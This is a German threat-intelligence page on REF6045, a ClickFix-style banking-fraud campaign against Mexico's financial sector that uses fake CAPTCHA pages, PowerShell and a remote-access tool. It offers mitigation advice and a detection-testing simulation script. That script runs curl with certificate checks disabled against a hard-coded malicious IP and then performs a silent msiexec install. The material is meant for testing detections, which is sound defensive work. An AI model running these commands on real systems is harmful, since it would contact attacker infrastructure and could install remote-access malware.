SOC Prime Bias: Hoch

08 Jul 2026 16:15 UTC

ClickFix zur Auszahlung: Eine mexikanische Werkzeugkiste für Bankbetrug entschlüsseln

Author Photo
SOC Prime Team linkedin icon Folgen
ClickFix zur Auszahlung: Eine mexikanische Werkzeugkiste für Bankbetrug entschlüsseln
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

REF6045 ist eine von einem Operator unterstützte Betrugskampagne im Bankwesen, die sich auf den mexikanischen Finanzsektor konzentriert. Sie verwendet eine ClickFix-ähnliche Zustellmethode mit gefälschten CAPTCHA-Seiten, um die Opfer dazu zu bewegen, schädliche PowerShell-Befehle auszuführen. Nach der Infektion ermöglicht das SCMBANKER-Toolkit menschlichen Operatoren, Bankvorgänge zu beobachten, Screenshots anzufertigen, Inhalte der Zwischenablage zu ändern und Remote Utilities RAT zur vollständigen Fernsteuerung bereitzustellen.

Untersuchung

Elastic Security Labs entdeckte die Bedrohung, nachdem sie verdächtige bitsadmin -Aktivitäten beim Herunterladen von PowerShell-Skripten aus einem offenen Verzeichnis entdeckt hatten. Die Untersuchung legte das vollständige Toolkit durch ein öffentlich zugängliches Web-Root-Archiv offen, zkt.zip, und enthüllte erhebliche operative Sicherheitslücken, einschließlich nicht authentifizierter Dateieditoren und offener Verzeichnisse in der Command-and-Control-Infrastruktur. Die Analyse zeigte auch, dass das Toolkit umfangreiche AI-generierte Artefakte in seiner Codebasis enthält.

Abschwächung

Organisationen sollten die Verwendung von PowerShell und bitsadmin auf genehmigte Benutzer beschränken und strenge Ausführungskontrollen durchsetzen. Benutzer sollten geschult werden, Social-Engineering-Köder wie gefälschte CAPTCHA-Aufforderungen oder gefälschte Windows Update-Bildschirme zu erkennen. Sicherheitsteams sollten außerdem eine starke Überwachung auf verdächtige Registry-Änderungen und die unbefugte Installation von Fernzugriffsoftware bereitstellen.

Reaktion

Wenn diese Aktivität erkannt wird, isolieren Sie betroffene Systeme sofort, um die Command-and-Control-Kommunikation und möglichen Datendiebstahl zu stoppen. Führen Sie eine forensische Untersuchung durch, um den Umfang der Kompromittierung zu bestimmen und prüfen Sie auf Remote Utilities oder unautorisierte Registry-Änderungen. Setzen Sie Passwörter für alle Finanz- und andere sensible Konten zurück, die von den betroffenen Maschinen aus zugegriffen wurden.

Angriffsfluss

Simulationsausführung

Voraussetzung: Der Telemetrie- & Baseline-Vorflug-Check muss bestanden sein.

Begründung: Dieser Abschnitt beschreibt die präzise Ausführung der gegnerischen Technik (TTP), die darauf abzielt, die Erkennungsregel auszulösen. Die Befehle und der Text MÜSSEN die identifizierten TTPs direkt widerspiegeln und darauf abzielen, genau die Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird. Abstrakte oder nicht verwandte Beispiele führen zu Fehldiagnosen.

  • Angriffsnarrative & Befehle: Der Gegner beabsichtigt, einen Fuß in das Zielsystem zu fassen, indem er das Muster der REF6045-Betrugskampagne imitiert. Zuerst versuchen sie, eine Validierungsdatei von einer fest codierten bösartigen IP-Adresse herunterzuladen (68.211.161.46) mit curl mit der -k (unsicher) Option, um die SSL-Zertifikatsvalidierung zu umgehen. Nach dem Download führt der Gegner eine stille Installation eines bösartigen Fernzugriffstools durch, indem er msiexec.exe mit der /i (installieren) und /quiet (still) Schalter verwendet und eine Datei namens hosts.msiZiel. Dies bietet ihnen beständigen Fernzugriff, während die Benutzerinteraktion minimiert wird.

  • Regressionstest-Skript:

    # Simulationsskript für REF6045 TTPs
    # Dieses Skript imitiert die spezifischen Befehlszeilen, die in der Erkennungsregel definiert sind.
    
    $WorkDir = "$env:TEMPSimulation"
    if (!(Test-Path $WorkDir)) { New-Item -ItemType Directory -Path $WorkDir }
    Set-Location $WorkDir
    
    Write-Host "[+] Schritt 1: Simulation des Ingress-Tool-Transfers via curl..." -ForegroundColor Cyan
    # Hinweis: Verwendung einer gefälschten Datei über curl zur Vermeidung von tatsächlichem bösartigem Datenverkehr,
    # aber die genaue Befehlszeilenzeichenfolge, die für die Erkennung erforderlich ist, wird beibehalten.
    cmd /c curl -k https://68.211.161.46/validation.txt
    
    Write-Host "[+] Schritt 2: Simulation der stillen MSI-Installation..." -ForegroundColor Cyan
    # Erstellen Sie eine Dummy-MSI-Datei, damit msiexec nicht sofort fehlschlägt (obwohl die Regel auf der Befehlszeile ausgelöst wird)
    # Zum Zweck des reinen Testens der ERKENNUNGSLOGIK (der Befehlszeile),
    # werden wir die genaue Befehlszeichenfolge ausführen.
    msiexec /i "hosts.msi" /quiet /norestart
  • Bereinigungsskripte:

    # Bereinigungsskript zum Entfernen von Artefakten
    $WorkDir = "$env:TEMPSimulation"
    if (Test-Path $WorkDir) {
        Remove-Item -Recurse -Force $WorkDir
        Write-Host "[+] Bereinigung abgeschlossen: $WorkDir entfernt." -ForegroundColor Green
    } else {
        Write-Host "[!] Bereinigung übersprungen: Verzeichnis nicht gefunden." -ForegroundColor Yellow
    }